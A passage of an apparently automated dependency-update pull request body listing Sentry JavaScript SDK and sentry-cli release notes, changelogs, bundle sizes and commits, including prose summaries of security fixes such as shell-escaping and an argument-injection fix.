href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eBundle size 📦\u003c/h2\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003ePath\u003c/th\u003e\n\u003cth\u003eSize\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.22 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e24.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e43.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing + Span Streaming)\u003c/td\u003e\n\u003ctd\u003e45.62 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Profiling)\u003c/td\u003e\n\u003ctd\u003e48.56 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.4 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay) - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e72.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay with Canvas)\u003c/td\u003e\n\u003ctd\u003e86.99 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e99.33 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Feedback)\u003c/td\u003e\n\u003ctd\u003e43 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. sendFeedback)\u003c/td\u003e\n\u003ctd\u003e30.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. FeedbackAsync)\u003c/td\u003e\n\u003ctd\u003e35.91 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics)\u003c/td\u003e\n\u003ctd\u003e27.27 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Logs)\u003c/td\u003e\n\u003ctd\u003e27.42 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics \u0026amp; Logs)\u003c/td\u003e\n\u003ctd\u003e28.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e27.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.9 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e31.01 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/svelte\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.24 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle\u003c/td\u003e\n\u003ctd\u003e28.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e46.04 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e29.89 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e47.14 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e68.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e83.6 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e88.23 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e89.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle - uncompressed\u003c/td\u003e\n\u003ctd\u003e83.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing) - uncompressed\u003c/td\u003e\n\u003ctd\u003e138.12 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e88.07 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e141.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e209.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/blob/develop/CHANGELOG.md\"\u003e@​sentry/browser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e10.53.0\u003c/h2\u003e\n\u003ch3\u003eImportant Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003efeat(core): Add \u003ccode\u003estreamGenAiSpans\u003c/code\u003e options to stream gen_ai spans (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20785\"\u003e#20785\u003c/a\u003e)\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAdds a new \u003ccode\u003estreamGenAiSpans\u003c/code\u003e option that controls how \u003ccode\u003egen_ai\u003c/code\u003e spans are\nsent to Sentry. When set, the SDK extracts all \u003ccode\u003egen_ai\u003c/code\u003e spans out of a\ntransaction and sends them as v2 envelope items.\u003c/p\u003e\n\u003cp\u003eEnable this option if gen_ai spans are being dropped because the transaction payload exceeds size limits.\u003c/p\u003e\n\u003cpre lang=\"ts\"\u003e\u003ccode\u003eSentry.init({\n  dsn: 'https://examplePublicKey@o0.ingest.sentry.io/0',\n  streamGenAiSpans: true,\n});\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(browser): Migrate browser profiling thread data to span attributes (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20800\"\u003e#20800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eaddConsoleInstrumentationFilter\u003c/code\u003e utility (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20790\"\u003e#20790\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eapplicationKey\u003c/code\u003e to \u003ccode\u003eBuildTimeOptionsBase\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20789\"\u003e#20789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): split exports by browser/server for bundle size (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20435\"\u003e#20435\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(nextjs): Add top-level \u003ccode\u003eapplicationKey\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20794\"\u003e#20794\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(node): Support Node 26 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20710\"\u003e#20710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(profiling-node): Bump \u003ccode\u003e@sentry-internal/node-cpu-profiler\u003c/code\u003e to 2.4.0 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20720\"\u003e#20720\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(cloudflare): avoid flush lock self-wait (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20719\"\u003e#20719\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(hono): Capture transaction name on request for correct culprit (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20801\"\u003e#20801\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(mcp): retroactively wrap handlers registered before wrapMcpServerWithSentry (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20699\"\u003e#20699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(node-core): Guard against undefined util.getSystemErrorMap (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20660\"\u003e#20660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(replay): Capture aborted/errored fetch requests in replay network tab (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20722\"\u003e#20722\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/cd9740818cba748dbced0e8a1497000a88ec8a56\"\u003e\u003ccode\u003ecd97408\u003c/code\u003e\u003c/a\u003e release: 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/66cfb25117ed7b14ca3da20a79b836619e9c8a6c\"\u003e\u003ccode\u003e66cfb25\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20838\"\u003e#20838\u003c/a\u003e from getsentry/prepare-release/10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/df8fd3863043f143961a5d96e79a717d62eada31\"\u003e\u003ccode\u003edf8fd38\u003c/code\u003e\u003c/a\u003e meta(changelog): Update changelog for 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/588100986580e0f5c8c3204661e59e5103e7d269\"\u003e\u003ccode\u003e5881009\u003c/code\u003e\u003c/a\u003e fix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/6a7d179ad38c7591021c88e4bd3ec82b3c6cc606\"\u003e\u003ccode\u003e6a7d179\u003c/code\u003e\u003c/a\u003e fix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/ad47c3c3de5b2bacfbbd08bcdf9cd90184ce64bc\"\u003e\u003ccode\u003ead47c3c\u003c/code\u003e\u003c/a\u003e ref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/28d6fe514d5ed00561a8e3d1c0406a8cb544c738\"\u003e\u003ccode\u003e28d6fe5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20826\"\u003e#20826\u003c/a\u003e from getsentry/master\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/46aca45a868d717939448ded1001fac4337ac46e\"\u003e\u003ccode\u003e46aca45\u003c/code\u003e\u003c/a\u003e Merge branch 'release/10.53.0'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/b5cbc9ca1800e1b4ee1de66e135a90891cecd570\"\u003e\u003ccode\u003eb5cbc9c\u003c/code\u003e\u003c/a\u003e chore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/tes...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/05489b83e7920fc4ce47a530054c5558c1704a45\"\u003e\u003ccode\u003e05489b8\u003c/code\u003e\u003c/a\u003e release: 10.53.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-javascript/compare/10.51.0...10.53.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@sentry/cli` from 3.4.1 to 3.4.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-cli/releases\"\u003e@​sentry/cli's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.4.3\u003c/h2\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBehavior-breaking\u003c/strong\u003e: Disable Xcode \u003ccode\u003eInfo.plist\u003c/code\u003e preprocessing by default to avoid passing project-controlled compiler settings to \u003ccode\u003ecc\u003c/code\u003e during release auto-discovery. This affects \u003ccode\u003esentry-cli releases propose-version\u003c/code\u003e, \u003ccode\u003esentry-cli send-event\u003c/code\u003e and \u003ccode\u003esentry-cli bash-hook --send-event\u003c/code\u003e release inference, and \u003ccode\u003esentry-cli react-native xcode\u003c/code\u003e auto-release detection. Use \u003ccode\u003e--allow-xcode-infoplist-preprocessing\u003c/code\u003e only for trusted projects that require preprocessing.\u003c/li\u003e\n\u003cli\u003eEnsure restrictive file permissions maintained when \u003ccode\u003esentry-cli login\u003c/code\u003e updates existing config files.\u003c/li\u003e\n\u003cli\u003eDisable TLS verification only when \u003ccode\u003ehttp.verify_ssl\u003c/code\u003e is set to \u003ccode\u003efalse\u003c/code\u003e, case-insensitively.\u003c/li\u003e\n\u003cli\u003eShell-escape generated \u003ccode\u003ebash-hook\u003c/code\u003e arguments, including paths, tags, release names, and the CLI path.\u003c/li\u003e\n\u003cli\u003eStop sending environment variables in \u003ccode\u003esentry-cli bash-hook\u003c/code\u003e events.\u003c/li\u003e\n\u003cli\u003eVerify the downloaded binary checksum before replacing the current executable in \u003ccode\u003esentry-cli update\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Skip uploading images that already exist in objectstore by batch-checking with HEAD requests first (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3305\"\u003e#3305\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Reject snapshot uploads that have a PR number but no base SHA, since comparisons cannot work without a base reference (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3300\"\u003e#3300\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.4.3-snapshot.20260521.69f5028\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 69f5028.\u003c/p\u003e\n\u003ch2\u003e3.4.3-snapshot.20260520.9eabaaa\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 9eabaaa.\u003c/p\u003e\n\u003ch2\u003e3.4.3-snapshot.20260511.6679316\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 6679316.\u003c/p\u003e\n\u003ch2\u003e3.4.3-snapshot.20260511.7a3b571\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 7a3b571.\u003c/p\u003e\n\u003ch2\u003e3.4.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Stop sending Sentry auth token to Objectstore (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3286\"\u003e#3286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e(js) Fix argument injection in JavaScript API's \u003ccode\u003eserializeOptions\u003c/code\u003e. String/number options now validate input types and prevent \u003ccode\u003eArray.prototype.concat()\u003c/code\u003e from flattening array values into separate CLI arguments. (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3287\"\u003e#3287\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.9081115\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 9081115.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.4052e78\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 4052e78.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.04c061a\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 04c061a.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260511.f5db2f6\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at f5db2f6.\u003c/p\u003e\n\u003ch2\u003e3.4.2-snapshot.20260508.660e98b\u003c/h2\u003e\n\u003cp\u003eSnapshot build from master at 660e98b.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-cli/blob/master/CHANGELOG.md\"\u003e@​sentry/cli's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.4.3\u003c/h2\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBehavior-breaking\u003c/strong\u003e: Disable Xcode \u003ccode\u003eInfo.plist\u003c/code\u003e preprocessing by default to avoid passing project-controlled compiler settings to \u003ccode\u003ecc\u003c/code\u003e during release auto-discovery. This affects \u003ccode\u003esentry-cli releases propose-version\u003c/code\u003e, \u003ccode\u003esentry-cli send-event\u003c/code\u003e and \u003ccode\u003esentry-cli bash-hook --send-event\u003c/code\u003e release inference, and \u003ccode\u003esentry-cli react-native xcode\u003c/code\u003e auto-release detection. Use \u003ccode\u003e--allow-xcode-infoplist-preprocessing\u003c/code\u003e only for trusted projects that require preprocessing.\u003c/li\u003e\n\u003cli\u003eEnsure restrictive file permissions maintained when \u003ccode\u003esentry-cli login\u003c/code\u003e updates existing config files.\u003c/li\u003e\n\u003cli\u003eDisable TLS verification only when \u003ccode\u003ehttp.verify_ssl\u003c/code\u003e is set to \u003ccode\u003efalse\u003c/code\u003e, case-insensitively.\u003c/li\u003e\n\u003cli\u003eShell-escape generated \u003ccode\u003ebash-hook\u003c/code\u003e arguments, including paths, tags, release names, and the CLI path.\u003c/li\u003e\n\u003cli\u003eStop sending environment variables in \u003ccode\u003esentry-cli bash-hook\u003c/code\u003e events.\u003c/li\u003e\n\u003cli\u003eVerify the downloaded binary checksum before replacing the current executable in \u003ccode\u003esentry-cli update\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Skip uploading images that already exist in objectstore by batch-checking with HEAD requests first (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3305\"\u003e#3305\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Reject snapshot uploads that have a PR number but no base SHA, since comparisons cannot work without a base reference (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3300\"\u003e#3300\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.4.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(snapshots) Stop sending Sentry auth token to Objectstore (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3286\"\u003e#3286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e(js) Fix argument injection in JavaScript API's \u003ccode\u003eserializeOptions\u003c/code\u003e. String/number options now validate input types and prevent \u003ccode\u003eArray.prototype.concat()\u003c/code\u003e from flattening array values into separate CLI arguments. (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/pull/3287\"\u003e#3287\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/ee5286953ea3b7e419e017c3c47f64e26a45ff19\"\u003e\u003ccode\u003eee52869\u003c/code\u003e\u003c/a\u003e release: 3.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/69f502877977e2e8aa54d913733be4557054ce42\"\u003e\u003ccode\u003e69f5028\u003c/code\u003e\u003c/a\u003e fix: Various fixes (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3308\"\u003e#3308\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/9eabaaabdb47e735e79fbb81f127e5083d5984b6\"\u003e\u003ccode\u003e9eabaaa\u003c/code\u003e\u003c/a\u003e perf(snapshots): Skip uploading images that already exist in objectstore (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3305\"\u003e#3305\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/2624b8d581ca1392675e27c96192646af273dee2\"\u003e\u003ccode\u003e2624b8d\u003c/code\u003e\u003c/a\u003e fix(snapshots): Reject uploads with pr_number but no base_sha (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3300\"\u003e#3300\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/667931613bf29c8dbf1d95d18dff74ae8644b684\"\u003e\u003ccode\u003e6679316\u003c/code\u003e\u003c/a\u003e build(npm): 🤖 Bump optional dependencies to 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/7a3b571784b6f509a66d682bf336262425686607\"\u003e\u003ccode\u003e7a3b571\u003c/code\u003e\u003c/a\u003e Merge branch 'release/3.4.2'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/e3f5f5518d53dfb00596df952a1a0513e11a90ee\"\u003e\u003ccode\u003ee3f5f55\u003c/code\u003e\u003c/a\u003e release: 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/f5db2f65581756fe78c49a22937db7c08610acb2\"\u003e\u003ccode\u003ef5db2f6\u003c/code\u003e\u003c/a\u003e build(deps): Update \u003ccode\u003eopenssl\u003c/code\u003e dependency (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3294\"\u003e#3294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/4052e78e2898282a377d8d82ce9d832faed06d25\"\u003e\u003ccode\u003e4052e78\u003c/code\u003e\u003c/a\u003e build(deps): Bump \u003ccode\u003erand\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3296\"\u003e#3296\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-cli/commit/04c061a407eaeda6e587edd495bc597161d31138\"\u003e\u003ccode\u003e04c061a\u003c/code\u003e\u003c/a\u003e build(js): Update \u003ccode\u003efast-uri\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-cli/issues/3295\"\u003e#3295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-cli/compare/3.4.1...3.4.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@sentry/react` from 10.51.0 to 10.53.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease 